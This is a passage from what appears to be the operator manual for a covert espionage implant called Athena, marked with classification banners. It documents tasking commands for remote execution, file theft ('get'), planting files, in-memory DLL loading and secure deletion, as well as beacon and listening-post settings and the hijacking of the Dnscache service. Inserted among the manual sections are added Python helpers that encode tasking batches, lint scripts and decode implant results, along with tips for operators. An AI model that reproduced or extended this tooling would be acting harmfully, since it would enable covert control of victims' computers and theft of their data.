________________________________________________________________________
Example: id 12345678
Output:
New Batch ID=0x12345678
8.3.1.7 (U) Help
(S//NF) The Help command displays the Tasker Shell Interface Help shown in Figure 17
(above). Each command has extensive help, which can be displayed by requesting help followed
by the command name.
Usage: help 

8.3.2 (U) Command Features
(U) NOTE: System environment strings will be expanded at runtime (e.g. %SYSTEMROOT%).
8.3.2.1 (U) Execute
(S//NF) This command executes a program on the target. The filename names the application to
run and arguments supplies its command line; system environment strings in either are expanded
on the target (see the note above). The task option selects a foreground (synchronous) or
background (asynchronous) task. The Parser output for an execute command includes the process
return code and any captured output (see 9.4.7). Pre- and post-delays may be placed around the
execution.
Usage: execute pre= post= task= filename= arguments=
Example: execute
[execute] - execute a command on target
Description: amount of time prior to command processing (0-default)
pre-delay (number):
Description: amount of time after command processing completes (0-default)
post-delay (number):
Description: 0=foreground(sync) 1=background(async) task (0-default)
task (number 0-foreground, 1-background):
Description: specific application name on target to execute
filename (string):ipconfig
Description: specific arguments used with this command
arguments (string):/all
Output:
COMMAND: execute pre=0 post=0 task=0 filename="ipconfig" arguments="/all"
8.3.2.2 (U) Get
(S//NF) This command will retrieve a file from the target.
Usage: get flag= filename=
Example: get
[get] - download a file from the target
Description: prioritize this get request
flag (bool): (not currently used)
Description: specific file to retrieve
filename (string):c:\temp\myfile.txt

Output:
COMMAND: get flag=0 filename="c:\temp\myfile.txt"
8.3.2.3 (U) Put
(S//NF) This command will send a file to the target. The local file must be present during the
generate command. The request will also fail if the directory does not exist on the target.
Usage: put remote_filename= local_filename=
Example: put
[put] - upload a file to the target
Description: local filename to use
local_filename (string):c:\temp\myfile.txt
Description: remote filename on target
remote_filename (string):c:\windows\system32\a.txt
Output:
COMMAND: put remote_filename="c:\windows\system32\a.txt" local_filename="c:\temp\myfile.txt"

8.3.2.4 (U) Memload
(S//NF) This command will load a DLL onto the target in the same address space as the target
service. The nickname option can be used to reference this specific DLL for unload.
Warning
(S//NF) The nickname is case sensitive.

Usage: memload pre=0 post=0 nickname= filename=
Example: memload
[memload] - load a DLL onto the target
Description: amount of time prior to command processing (0-default)
pre-delay (number):
Description: amount of time after command processing completes (0-default)
post-delay (number):
Description: a unique name used for this module
nickname (string):mymodule
Description: specific DLL module to load on target
filename (string):c:\temp\magic.dll
Output:
COMMAND: memload pre=0 post=0 nickname="mymodule" filename="c:\temp\magic.dll"

8.3.2.5 (U) Memunload
(S//NF) This command will unload a loaded module based on the nickname provided in the
memload command. WARNING: The nickname is case sensitive.
Usage: memunload pre=0 nickname=
Example:
[memunload] - unload a DLL already loaded on target
Description: amount of time prior to command processing (0-default)
pre-delay (number):
Description: specific nickname used during memload
nickname (string):mymodule
Output:
COMMAND: memunload pre=0 nickname="mymodule"
8.3.2.6 (U) Set
(S//NF) This command will update a specific configuration option. The following list shows all
the configuration options available via this command.
interval={number} - beacon interval
jitter={percent} - beacon jitter in percent
bootdelay={number} - amount of time to wait at each boot
hibernationdelay={number} - amount of time to wait after install
taskingdelay={number} - amount of time to wait before tasking
domains={string} - IP or URL of the listening post
port={port} - port number of the listening post
proxyport={port} - port number of the proxy
proxyaddress={ipaddress} - IP address of the proxy
useragentstring={string} - user agent string sent with the command
urlpath={string} - URL path for tasking
acceptstring={string} - Accept header string
acceptlangstring={string} - Accept-Language header string
acceptencodingstring={string} - Accept-Encoding header string
ieproxyaddress={string} - IE proxy address string
wpadproxyaddress={string} - WPAD proxy address string
statefilepath={string} - state information processing path
batchexecutiontimeout={number} - maximum amount of time per batch
commandexecutiontimeout={number} - maximum amount of time per command
maxchunksize={number} - maximum number of bytes to process per send
maxcpuutilization={percent} - maximum CPU utilization during processing
maxprocessingdatasize={number} - maximum data size
uninstalldate={date(YYYY-MM-DDTHH:MM:SS)} - time to uninstall
deadmandelay={number} - maximum time to wait for a successful beacon
beaconfailures={number} - maximum number of failed beacons before uninstall
killfilepath={string} - location of the kill file
safety={number} - any number; performs a no-operation (NOOP)

Usage: set pre=0 post=0 =
Example:
[set] - update a specific configuration setting on target
Description: amount of time prior to command processing (0-default)
pre-delay (number):
Description: amount of time after command processing completes (0-default)
post-delay (number):

Description: specific name of configuration
name:interval
Description: specific value for the configuration
value (number):20000
Output:
COMMAND: set pre=0 post=0 interval=20000
8.3.2.7 (U) Delete
(S//NF) This command will securely delete a file on the target system.
Usage: delete 
Example:
[delete] - securely delete a file on the target
Description: filename to use
filename (string):c:\temp\magic.dll
Output:
COMMAND: delete filename="c:\temp\magic.dll"
8.3.2.8 (U) Uninstall
(S//NF) This command will uninstall the implant from the target system.
Usage: uninstall
Example: uninstall
[uninstall] - uninstall tool from target
Description: amount of time prior to command processing (0-default)
pre-delay (number):
Output:
COMMAND: uninstall pre=0

8.4 (U) User Interface Example

(S//NF) Example: (Athena)
>python.exe tasker.py
Management Features
============================================================
receipt generate ls rm import id help
Command Features
============================================================
execute get put memload memunload set delete uninstall
Exit Commands:
============================================================
bye exit
Welcome to the Tasker shell.

Type help or ? to list commands.

tasker::no receipt>receipt builder_output\e0Eo\receipt.xml
New Receipt Loaded:
Receipt File: builder_output\e0Eo\receipt.xml
Parent ID: e0Eo
tasker::e0Eo>execute
[execute] - execute a command on target
Description: amount of time prior to command processing (0-default)
pre-delay (number):
Description: amount of time after command processing completes (0-default)
post-delay (number):
Description: specific application name on target to execute
filename (string):ipconfig
Description: specific arguments used with this command
arguments (string):/all
COMMAND: execute pre=0 post=0 filename="ipconfig" arguments="/all"

Figure 18 - (S//NF) Tasker Shell Interface Example – Part 1
OR
>python.exe tasker.py
Management Features
============================================================
receipt generate ls rm import id help
Command Features
============================================================
execute get put memload memunload set delete uninstall
Exit Commands:
============================================================
bye exit
Welcome to the Tasker shell.

Type help or ? to list commands.

tasker::e0Eo>execute pre=0 post=0 filename=ipconfig arguments=/all
COMMAND: execute pre=0 post=0 filename="ipconfig" arguments="/all"
tasker::e0Eo>generate
[generate] - output binary batch file for a specific target
Description: prioritize this batch request on LP (0-high, 255-low)
Default: 128
priority (number 0..255):
Description: persist this batch on LP - do not delete after transfer
Default: False
persist (bool):
Description: Stop executing this batch on a command error
Default: False
stoponerror (bool):
Description: specific path to store batch (binary file and script)
Default: tasker_output
output path (string):
PATH: d:\Development\Athena\athena_suite\tasker_output\e0Eo
RSA encrypting header with client public key
BINARY: __128_e0Eo_1111
SCRIPT: __128_e0Eo_1111_script.txt
BATCH: 00001111
0: execute pre=0 post=0 filename="ipconfig" arguments="/all"

Figure 19 - (S//NF) Tasker Shell Interface Example – Part 2


8.5 (U) Output
(S//NF) The Tasker produces a binary file (no extension) and a text file (.txt). The binary file
is copied to the Listening Post for download to the target. The text file is an unencrypted textual
reference of the commands within the specific batch file, which can be used as a historical
reference or as an input to the Tasker to generate a duplicate batch.

8.5.1 (U) Binary-Based Output File
(S//NF) Sample output: __128_test_ABCD0064_12345678
(S//NF) The binary file is an encrypted block that can only be decrypted by the target. The
Listening Post cannot decode the content of this file. To allow the Listening Post some
knowledge about the file’s content and priority, the filename is encoded as described below:
Table 9 – (U) Command File Encoding
Filename Component | Value  | Description
Position 0         | _      | The underbar shows that this is a standard batch file (e.g. __128).
Position 0         | +      | The plus sign tells the server that this file is persistent and the server will not delete it after processing (e.g. +_128).
Priority           | number | This number represents the priority. 0-highest and 255-lowest (NOTE: 128-default)
Parent             | string | This string represents the target parent ID. This name must match the parent ID reference in the directory.
Child              | hex    | This hex string is the target child ID. This name must match the child ID reference in the directory.
Batch              | hex    | This hex string is the batch ID. This is a random number which prevents duplicate batches.
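The encoding in Table 9 is what lets the Listening Post order and retain batches without being able to decrypt them. The following Python is added here as an example and is not part of the Athena tooling: it decodes and re-encodes the file names shown on this page and applies the serving rules from 8.2.4, 8.2.5 and 8.3.1.2 to a directory listing. It assumes the layout <flag>_<priority>_<parent>[_<child>]_<batch>, treats the child component as optional because the Figure 19 sample (__128_e0Eo_1111) has none, and works on a constructed listing; none of the IDs refer to real targets.

```python
"""Encode and decode Athena batch file names (Table 9) and pick the file the
Listening Post would serve next.

Added example for this page, not tasker.py or Listening Post code. Assumed
layout, read off the samples above:
    <flag>_<priority>_<parent>[_<child>]_<batch>[_script.txt]
flag is '_' (standard) or '+' (persistent), priority is decimal 0..255, child
and batch are hex. Child is treated as optional because the Figure 19 sample
(__128_e0Eo_1111) has none; that reading is an assumption.
"""
from dataclasses import dataclass
from typing import Optional

SCRIPT_SUFFIX = "_script.txt"


@dataclass(frozen=True)
class BatchName:
    priority: int         # 0 = highest, 255 = lowest, 128 = default
    persistent: bool      # '+' in position 0: the LP keeps the file after serving it
    parent: str           # target parent ID, e.g. 'test'
    child: Optional[str]  # target child ID in hex, e.g. 'ABCD0064'
    batch_id: int         # random batch ID that prevents duplicate batches

    def binary_name(self) -> str:
        parts = ["+" if self.persistent else "_", str(self.priority), self.parent]
        if self.child is not None:
            parts.append(self.child)
        parts.append(f"{self.batch_id:X}")  # the samples are not zero-padded
        return "_".join(parts)

    def script_name(self) -> str:
        return self.binary_name() + SCRIPT_SUFFIX


def parse_batch_name(name: str) -> BatchName:
    """Decode a binary or script file name; raise ValueError if it is malformed."""
    if name.endswith(SCRIPT_SUFFIX):
        name = name[: -len(SCRIPT_SUFFIX)]
    if len(name) < 2 or name[0] not in "_+" or name[1] != "_":
        raise ValueError(f"bad flag or separator in {name!r}")
    parts = name[2:].split("_")
    if len(parts) not in (3, 4) or not all(parts):
        raise ValueError(f"unexpected component count in {name!r}")
    priority = int(parts[0])  # ValueError on a non-numeric priority
    if not 0 <= priority <= 255:
        raise ValueError(f"priority {priority} outside 0..255")
    child = parts[2] if len(parts) == 4 else None
    return BatchName(priority, name[0] == "+", parts[1], child, int(parts[-1], 16))


def next_batch_for(parent: str, child: Optional[str], listing) -> Optional[str]:
    """File name the LP would hand to this target on its next beacon, or None.

    Rules from 8.2.4, 8.2.5 and 8.3.1.2: one batch per beacon, lowest priority
    number first, and a persistent (SAFETY) batch only when no ordinary batch is
    waiting. Script files, other targets' files and unrelated files are ignored.
    """
    waiting = []
    for fname in listing:
        if fname.endswith(SCRIPT_SUFFIX):
            continue
        try:
            b = parse_batch_name(fname)
        except ValueError:
            continue
        if b.parent != parent or (b.child and child and b.child != child):
            continue
        waiting.append((b.persistent, b.priority, fname))
    return min(waiting)[2] if waiting else None


# Constructed directory listing for illustration; the IDs are not real targets.
SAMPLE_LISTING = [
    "__128_test_ABCD0064_63A95A3C",
    "__128_test_ABCD0064_63A95A3C_script.txt",
    "__5_test_ABCD0064_0BADF00D",
    "+_0_test_ABCD0064_5AFE0001",
    "__1_other_ABCD0064_DEADBEEF",
    "__128_e0Eo_1111",
    "README.txt",
]
```

Note that a persistent batch loses to any ordinary batch regardless of its priority number, which is why the SAFETY file in the sample listing carries priority 0 yet is only served once the two ordinary batches for the target are gone.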

8.5.2 (U) Text-Based Output File
(S//NF) Sample output: __128_test_ABCD0064_12345678_script.txt
(S//NF) The text file contains the textual representation of the command. This content is stored
in the text file as UTF-8. The file name is the same as the corresponding binary file with the
_script.txt extension.
# ATHENA SCRIPT
execute pre=0 post=0 task=0 filename="ipconfig" arguments="/all"
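Because the _script.txt file is both the human-readable record of a batch and valid input for import, it is worth checking a script before generate rather than discovering a bad line on target. The following Python is an added example, not tasker.py: it tokenizes the command lines shown in 8.3.2 and 8.5.2, checks required parameters, validates set option values against the kinds listed in 8.3.2.6 (numeric ranges, IP addresses and the YYYY-MM-DDTHH:MM:SS date) and renders commands back to script form. The required/optional split and the value ranges are assumptions made here; the sample script is constructed.

```python
"""Parse and lint an Athena tasking script (the *_script.txt format of 8.5.2).

Added example for this manual, not the tasker.py code. Command names and
parameters follow the usage lines in 8.3.2 and the set option list in 8.3.2.6;
which parameters are required and which value ranges are enforced are
assumptions made here for illustration.
"""
import ipaddress
import re
from datetime import datetime

HEADER = "# ATHENA SCRIPT"
COMMANDS = {  # command -> (required parameters, optional parameters)
    "execute": ({"filename"}, {"pre", "post", "task", "arguments"}),
    "get": ({"filename"}, {"flag"}),
    "put": ({"remote_filename", "local_filename"}, set()),
    "memload": ({"nickname", "filename"}, {"pre", "post"}),
    "memunload": ({"nickname"}, {"pre"}),
    "set": (set(), {"pre", "post"}),  # plus exactly one option from SET_OPTIONS
    "delete": ({"filename"}, set()),
    "uninstall": (set(), {"pre"}),
}
INT_PARAMS = {"pre", "post", "task", "flag"}
SET_OPTIONS = {  # configuration option -> value kind, from the 8.3.2.6 list
    "interval": "number", "jitter": "percent", "bootdelay": "number",
    "hibernationdelay": "number", "taskingdelay": "number", "domains": "string",
    "port": "port", "proxyport": "port", "proxyaddress": "ipaddress",
    "useragentstring": "string", "urlpath": "string", "acceptstring": "string",
    "acceptlangstring": "string", "acceptencodingstring": "string",
    "ieproxyaddress": "string", "wpadproxyaddress": "string",
    "statefilepath": "string", "batchexecutiontimeout": "number",
    "commandexecutiontimeout": "number", "maxchunksize": "number",
    "maxcpuutilization": "percent", "maxprocessingdatasize": "number",
    "uninstalldate": "date", "deadmandelay": "number", "beaconfailures": "number",
    "killfilepath": "string", "safety": "number",
}
RANGES = {"number": (0, 2**32 - 1), "percent": (0, 100), "port": (1, 65535)}
# name=value; the value is either "quoted" (taken literally, so backslashes in
# Windows and UNC paths survive, which shlex.split would not guarantee) or bare.
_TOKEN_RE = re.compile(r'\s*(\w+)=(?:"([^"]*)"|(\S*))')


def check_value(kind, value):
    """Validate a set option value for its kind; raise ValueError if it is not valid."""
    if kind in RANGES:
        n, (low, high) = int(value), RANGES[kind]
        if not low <= n <= high:
            raise ValueError(f"{kind} value {n} outside {low}..{high}")
        return n
    if kind == "ipaddress":
        return str(ipaddress.ip_address(value))
    if kind == "date":
        datetime.strptime(value, "%Y-%m-%dT%H:%M:%S")  # ValueError on a bad date
    return value


def parse_line(line):
    """Turn one script line into (command, {parameter: value}) or raise ValueError."""
    cmd, _, rest = line.strip().partition(" ")
    if cmd not in COMMANDS:
        raise ValueError(f"unknown command {cmd!r}")
    params, pos = {}, 0
    while pos < len(rest):
        m = _TOKEN_RE.match(rest, pos)
        if not m:
            raise ValueError(f"cannot parse {rest[pos:]!r}")
        params[m.group(1)] = m.group(3) if m.group(2) is None else m.group(2)
        pos = m.end()
    required, optional = COMMANDS[cmd]
    given = set(params)
    if required - given:
        raise ValueError(f"{cmd}: missing {sorted(required - given)}")
    for name in given & INT_PARAMS:
        params[name] = int(params[name])
    if cmd == "set":
        options = given - optional
        if len(options) != 1:
            raise ValueError("set: exactly one configuration option expected")
        (name,) = options
        if name not in SET_OPTIONS:
            raise ValueError(f"set: unknown option {name!r}")
        params[name] = check_value(SET_OPTIONS[name], params[name])
    elif given - required - optional:
        raise ValueError(f"{cmd}: unexpected {sorted(given - required - optional)}")
    return cmd, params


def format_line(cmd, params):
    """Render a parsed command back into script form (numbers bare, text quoted)."""
    out = [f"{k}={v}" if isinstance(v, int) else f'{k}="{v}"' for k, v in params.items()]
    return " ".join([cmd] + out)


def lint_script(text):
    """Return 'line N: problem' for every bad line; an empty list means clean."""
    lines = text.splitlines()
    problems = [] if lines and lines[0].strip() == HEADER else [
        "line 1: missing '# ATHENA SCRIPT' header"]
    for n, line in enumerate(lines[1:], start=2):
        if line.strip() and not line.startswith("#"):
            try:
                parse_line(line)
            except ValueError as exc:
                problems.append(f"line {n}: {exc}")
    return problems


SAMPLE_SCRIPT = r"""# ATHENA SCRIPT
execute pre=0 post=0 task=0 filename="ipconfig" arguments="/all"
put remote_filename="c:\windows\system32\a.txt" local_filename="c:\temp\myfile.txt"
set pre=0 post=0 interval=20000
set uninstalldate=2016-03-01T00:00:00
uninstall pre=0
"""  # constructed sample, not from the manual
```

Run lint_script over a script before importing it; because parse_line and format_line round-trip, the same code can also regenerate a script from the command list that ls prints.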

9. (U) Parser
(S//NF) Some general usage comments are presented below:
• Any default value (e.g., [bracketed text]) is either randomly generated or a suggestion; using the same value on multiple operations without modification may present a signature that could identify the presence of Athena in a network.
• The word 'overt' in a prompt for configuration information indicates that the information will be visible to a user logged on to the target machine. Care should be taken to ensure these values are consistent with the operational CONOP.
• Configuration settings that can be modified when the implant is on target are indicated in the prompt text.

9.1 (U) Usage
(S//NF) This section contains information for parsing encrypted data from an implant. Figure 20
shows the command line options for the Parser.
Warning

(S//NF) Implant parsing may be completed on the low-side;
however, the operator should be aware that cryptographic key
data will be in the clear.

(S//NF) By default, the Parser will use the local directory for input and output directory
locations. A single receipt file or directory of receipt files can be included as a command line
option. By default, the builder_output\receipts directory will be used to process receipts built
with the Builder.
Parser Tool
usage: parser.py [-h] [-r RECEIPT] [-i INPUT] [-d] [-o OUTPUT] [-m]
Parser Configuration
optional arguments:
-h, --help
show this help message and exit
-r RECEIPT, --receipt RECEIPT
This argument defines an existing receipt filename or
directory of receipts to be used for processing.
-i INPUT, --input INPUT
This argument provides the ability to import a file
or directory of files.
-d, --debug
Enable decoding of unencrypted files from target
-o OUTPUT, --output OUTPUT
This argument provides the output path location.
-m, --nomark
This argument provides the ability to reuse a
processed directory. By default, the parsing code
will mark processed files with a date prefix. (e.g.
20150908_1010_{30996559-C169-490B-A40B-4ADB597E0D19}.

Figure 20 - (S//NF) Parser Command Line Options

9.2 (U) Command Line Options
9.2.1 (U) RECEIPT
(S//NF) This argument defines an existing receipt filename to be used for processing. This is the
file name with full path to the receipt file generated by the Builder.


9.2.2 (U) INPUT
(S//NF) This argument provides the ability to import a file or directory of files into the Parser.
By default, the Parser will search the parser_input directory for files that are not marked.

9.2.3 (U) OUTPUT
(S//NF) This argument provides the output path location. By default, the Parser will place the
output results in the parser_output directory.

9.2.4 (U) NOMARK
(S//NF) This argument provides the ability to reuse a processed directory. By default, the parsing
code will mark processed files with a date prefix. (e.g. 20150908_1010_30996559)

9.3 (U) Processing Responses and Safeties
(S//NF) The Parser will process all the output files from the Listening Post. By default, the
Listening Post will store the response file as __.
Example: test_ABCD0064_20151221_18_55_28_4091
(S//NF) Once the Parser processes the file, it will preface the filename with the parsing date.
Example: [20151221_18_59_26_6964]_test_ABCD0064_20151221_18_55_28_4091
(S//NF) This strategy will allow processed files to remain in the parser_input directory without
slowing down processing of newly added response files.
Note
(S//NF) To simplify processing, place newly uploaded
responses and safeties in the parser_input directory.
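The marking scheme above is what makes parser_input safe to reuse across runs. The following Python is an added example and not the parser.py code: it selects the unprocessed response files from a directory listing (or all of them when --nomark is in effect), orders them oldest beacon first, and builds the [timestamp]_ prefix. It assumes the <parent>_<child>_<YYYYMMDD>_<HH>_<MM>_<SS>_<nnnn> shape of the 9.3 sample, with the trailing four digits treated as an opaque sequence field; Figure 20 shows a different prefix style, and this example follows 9.3. The listing is constructed.

```python
"""Select and mark Listening Post response files as section 9.3 describes.

Added example, not the parser.py code. It assumes response names look like the
9.3 sample, <parent>_<child>_<YYYYMMDD>_<HH>_<MM>_<SS>_<nnnn>, with the last
four digits treated as an opaque sequence field, and that a processed file
carries a '[<parse time in the same form>]_' prefix.
"""
import re
from datetime import datetime

_MARK_RE = re.compile(r"^\[(\d{8}_\d{2}_\d{2}_\d{2}_\d{4})\]_(.+)$")
_RESP_RE = re.compile(
    r"^(?P<parent>[^_]+)_(?P<child>[0-9A-Fa-f]+)_(?P<date>\d{8})_"
    r"(?P<hh>\d{2})_(?P<mm>\d{2})_(?P<ss>\d{2})_(?P<seq>\d{4})$"
)


def split_mark(name):
    """Return (mark, original_name); mark is None when the file is unprocessed."""
    m = _MARK_RE.match(name)
    return (m.group(1), m.group(2)) if m else (None, name)


def parse_response_name(name):
    """Decode a response file name (marked or not) into target and beacon time."""
    _, base = split_mark(name)
    mt = _RESP_RE.match(base)
    if not mt:
        raise ValueError(f"not a response file name: {name!r}")
    when = datetime.strptime(mt["date"] + mt["hh"] + mt["mm"] + mt["ss"], "%Y%m%d%H%M%S")
    return {"parent": mt["parent"], "child": mt["child"], "beacon_time": when, "seq": mt["seq"]}


def mark_name(name, now):
    """Prefix a processed file with the parse time, e.g. [20151221_18_59_26_6964]_..."""
    stamp = now.strftime("%Y%m%d_%H_%M_%S") + f"_{now.microsecond // 100:04d}"
    return f"[{stamp}]_{name}"


def select_unprocessed(listing, parent=None, nomark=False):
    """Files the Parser would pick up from parser_input: unmarked response files
    only (every response file when --nomark is given), optionally limited to one
    parent ID, ordered oldest beacon first so responses are read in order."""
    picked = []
    for name in listing:
        mark, base = split_mark(name)
        if mark and not nomark:
            continue  # already processed on an earlier run
        try:
            info = parse_response_name(base)
        except ValueError:
            continue  # not a response file, e.g. a stray batch file
        if parent and info["parent"] != parent:
            continue
        picked.append((info["beacon_time"], info["seq"], name))
    return [name for _, _, name in sorted(picked)]


# Constructed directory listing for illustration (not from the manual).
SAMPLE_LISTING = [
    "test_ABCD0064_20151221_18_55_28_4091",
    "[20151221_18_59_26_6964]_test_ABCD0064_20151221_18_55_28_4091",
    "test_ABCD0064_20151221_18_50_00_0001",
    "other_AAAA0001_20151221_19_00_00_0000",
    "__128_test_ABCD0064_12345678",
]
```

The ordering matters more than it looks: a set response and a later get response for the same target only make sense read in beacon order, and the file name is the only timestamp available before decryption.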

9.4 (U) Output
(S//NF) The Parser produces a text file containing the command and results of each response.

9.4.1 (U) Get
(S//NF) The Get command will also store a file with the same name as the results text file that
contains the content of the file retrieved:
Batch ID = 0x11111111
Command ID = 0x00000000
Command Type = get
Command Status = 0x00000000
Error Code = 0x00000000
Persist = False
Stop On Error = False
Parent ID = test
Target ID = ABCD0086
Time = Mon Dec 21 22:08:47 2015 GMT
Filename = GET.TXT
Attributes = ARCHIVE

Modify Time: Mon Dec 21 22:08:02 2015 GMT
Create Time: Mon Dec 21 22:08:02 2015 GMT
File Size: 18 bytes
Output Filename: d:\Development\Athena\Tests\TestCommandEngine\parser_output\test\ABCD0086\responses\20151221_17_10_01_0375_get.bin

9.4.2 (U) Put
(S//NF) An example of the Parser output from a successful Put command is shown below:
Batch ID = 0x22222222
Command ID = 0x00000000
Command Type = put
Command Status = 0x00000000
Error Code = 0x00000000
Persist = False
Stop On Error = False
Parent ID = test
Target ID = ABCD0086
Time = Mon Dec 21 22:08:52 2015 GMT
Filename = d:\Development\Athena\Tests\TestCommandEngine\win32\debug\put.txt

9.4.3 (U) Set
(S//NF) The SET command can return an error for the reasons listed below; in both cases the
return code is ARESULT_DISK_ERROR (0xA0000104). parser.py detects this code and reports it
as "DATA NOT PERSISTED". The dynamic data storage updates the setting in memory, so the
change takes effect, but it will not survive the next reboot.
1) If the implant is running in ram-only mode, the attempt to write to disk returns an error.
2) If the implant is configured with an invalid dyn_config file, the attempt to write to the
file returns an error.
Output: Error Code = DATA NOT PERSISTED
(S//NF) An example of the Parser output from a successful Set command is shown below:
Batch ID = 0x33333333
Command ID = 0x00000000
Command Type = set
Command Status = 0x00000000
Error Code = 0x00000000
Persist = False
Stop On Error = False
Parent ID = test
Target ID = ABCD0086
Time = Mon Dec 21 22:08:58 2015 GMT
Set Type = killfilepath
Argument = c:\temp\kill


9.4.4 (U) Memload
(S//NF) An example of the Parser output from a successful Memload command is shown below:
Batch ID = 0x55555555
Command ID = 0x00000000
Command Type = memload
Command Status = 0x00000000
Error Code = 0x00000000
Persist = False
Stop On Error = False
Parent ID = test
Target ID = ABCD0086
Time = Mon Dec 21 22:09:07 2015 GMT
Memory Address = 0x10000000
Nickname = testdll nickname

9.4.5 (U) Memunload
(S//NF) An example of the Parser output from a successful Memunload command is shown
below:
Batch ID = 0x66666666
Command ID = 0x00000000
Command Type = memunload
Command Status = 0x00000000
Error Code = 0x00000000
Persist = False
Stop On Error = False
Parent ID = test
Target ID = ABCD0086
Time = Mon Dec 21 22:09:12 2015 GMT
Memory Address = 0x10000000
Nickname = testdll nickname

9.4.6 (U) Delete
(S//NF) An example of the Parser output from a successful Delete command is shown below:
Batch ID = 0x77777777
Command ID = 0x00000000
Command Type = delete
Command Status = 0x00000000
Error Code = 0x00000000
Persist = False
Stop On Error = False
Parent ID = test
Target ID = ABCD0086
Time = Mon Dec 21 22:09:17 2015 GMT
Filename = d:\Development\Athena\Tests\TestCommandEngine\win32\debug\deleteme.txt

9.4.7 (U) Execute
(S//NF) An example of the Parser output from a successful Execute command is shown below:

Batch ID = 0x44444444
Command ID = 0x00000001
Command Type = execute
Command Status = 0x00000000
Error Code = 0x00000000
Persist = False
Stop On Error = False
Parent ID = test
Target ID = ABCD0086
Time = Mon Dec 21 22:09:02 2015 GMT
Filename = %systemroot%\system32\net.exe
Process Return Code = 0x00000000
<>
New connections will be remembered.

Status       Local     Remote                     Network
-------------------------------------------------------------------------------
Unavailable  Z:        \\10.3.2.91\Athena         Microsoft Windows Network
The command completed successfully.

9.4.8 (U) Uninstall
(S//NF) An example of the Parser output from a successful Uninstall command is shown below:
Batch ID = 0x99999999
Command ID = 0x00000000
Command Type = uninstall
Command Status = 0x00000000
Error Code = 0x00000000
Persist = False
Stop On Error = False
Parent ID = test
Target ID = ABCD0086
Time = Mon Dec 21 23:50:00 2015 GMT

9.5 (S//NF) Error Codes

(S//NF) The implant defines the error codes listed in Table 10. Standard Windows error codes
may also be returned, but most failures are reported as -1 (0xFFFFFFFF).
Table 10 - (U) Error Codes
Error      | Description
0x00000000 | Success
0xA0000001 | Invalid PE Header
0xA0000002 | Initialization Failure – target DLL
0xA0000003 | Teardown Failure – target DLL
0xA0000004 | Relocation Failure – target DLL
0xA0000005 | DLL Name Allocation Failure
0xA0000006 | Forwarder Entry Allocation Failure
0xA0000007 | Forwarder Buffer Overflow
0xA0000008 | Duplicate Entry
0xA0000101 | Timeout
0xA0000102 | Size too big
0xA0000103 | Out of memory
0xA0000104 | Disk Error – invalid disk name or ram only
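An error arrives in the result record as a raw hex value, so an operator reading many responses wants the code turned into the Table 10 description, with the set special case from 9.4.3 and the fall-through to Windows error codes handled. The following Python is an added example, not parser.py: it parses a Key = Value result record of the shape shown in 9.4, separates any trailing command output, and decodes the Error Code. The sample records are constructed from the 9.4 layout.

```python
"""Decode implant error codes in Parser result records (9.4 and 9.5).

Added example, not parser.py. ERROR_CODES is Table 10; the DATA NOT PERSISTED
rewrite for a set command follows 9.4.3; codes outside the 0xA0000xxx range are
reported as Windows error codes, as 9.5 says they may be. The record format is
the 'Key = Value' block shown in 9.4; the sample records below are constructed.
"""
ERROR_CODES = {
    0x00000000: "Success",
    0xA0000001: "Invalid PE Header",
    0xA0000002: "Initialization Failure - target DLL",
    0xA0000003: "Teardown Failure - target DLL",
    0xA0000004: "Relocation Failure - target DLL",
    0xA0000005: "DLL Name Allocation Failure",
    0xA0000006: "Forwarder Entry Allocation Failure",
    0xA0000007: "Forwarder Buffer Overflow",
    0xA0000008: "Duplicate Entry",
    0xA0000101: "Timeout",
    0xA0000102: "Size too big",
    0xA0000103: "Out of memory",
    0xA0000104: "Disk Error - invalid disk name or ram only",
}
ARESULT_DISK_ERROR = 0xA0000104
HEX_FIELDS = {"Batch ID", "Command ID", "Command Status", "Error Code",
              "Process Return Code", "Memory Address"}
BOOL_FIELDS = {"Persist", "Stop On Error"}


def describe_error(code, command_type=None):
    """Human-readable meaning of an Error Code value (int, may be negative)."""
    code &= 0xFFFFFFFF
    if code == 0xFFFFFFFF:
        return "Generic failure (-1)"
    if code == ARESULT_DISK_ERROR and command_type == "set":
        return "DATA NOT PERSISTED"  # applied in memory only, lost at reboot (9.4.3)
    if code in ERROR_CODES:
        return ERROR_CODES[code]
    if code >> 20 == 0xA00:
        return f"Undocumented implant error 0x{code:08X}"
    return f"Windows error 0x{code:08X} ({code})"


def parse_record(text):
    """Split a record into its 'Key = Value' fields and the trailing command output.

    The first line without ' = ' starts the output; everything after it is kept
    verbatim, so output lines that happen to contain ' = ' are not mistaken for
    fields. Hex and boolean fields are converted."""
    fields, output = {}, []
    for line in text.splitlines():
        key, sep, value = line.partition(" = ")
        if sep and not output:
            if key in HEX_FIELDS:
                value = int(value, 16)
            elif key in BOOL_FIELDS:
                value = value == "True"
            fields[key] = value
        elif line.strip() or output:
            output.append(line)
    return fields, output


def summarize(text):
    """Per-record verdict: which batch/command, for which target, and why it failed."""
    fields, output = parse_record(text)
    code = fields.get("Error Code", 0)
    return {
        "batch": fields["Batch ID"],
        "command": fields["Command Type"],
        "target": f'{fields["Parent ID"]}/{fields["Target ID"]}',
        "ok": code == 0 and fields.get("Command Status", 0) == 0,
        "error": describe_error(code, fields["Command Type"]),
        "output": output,
    }


# Constructed sample records (shape from 9.4; values are illustrative only).
SAMPLE_SET_NOT_PERSISTED = """\
Batch ID = 0x33333333
Command ID = 0x00000000
Command Type = set
Command Status = 0x00000000
Error Code = 0xA0000104
Persist = False
Stop On Error = False
Parent ID = test
Target ID = ABCD0086
Time = Mon Dec 21 22:08:58 2015 GMT
Set Type = killfilepath
Argument = c:\\temp\\kill
"""
SAMPLE_EXECUTE = """\
Batch ID = 0x44444444
Command ID = 0x00000001
Command Type = execute
Command Status = 0x00000000
Error Code = 0x00000000
Persist = False
Stop On Error = False
Parent ID = test
Target ID = ABCD0086
Time = Mon Dec 21 22:09:02 2015 GMT
Filename = %systemroot%\\system32\\net.exe
Process Return Code = 0x00000000
New connections will be remembered.
The command completed successfully.
"""
```

A set reported as DATA NOT PERSISTED still changed the running implant, so an operator who sees it should plan to re-issue the set after any reboot rather than treat the command as having had no effect.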

10.(U) Notes and Observations
10.1 (U) Installations of Hera Require a Reboot for Elevated Access Privileges
(S//NF) Hera hijacks the Dnscache service on installation. On Windows 7 and 8 this service runs
in a netsvcs svchost instance by default, but on Windows 8.1 and Windows 10 it runs as
NetworkService, a user context with reduced privileges on the system. Because of how svchost
is implemented, the service will only run in the netsvcs context after the next reboot. To account
for this deficiency and still provide immediate execution after installation, the existing service
runs as NetworkService (not SYSTEM) until the next reboot, at which time the SYSTEM-context
netsvcs instance is engaged. As a result, until a reboot occurs, some attempts to access files may
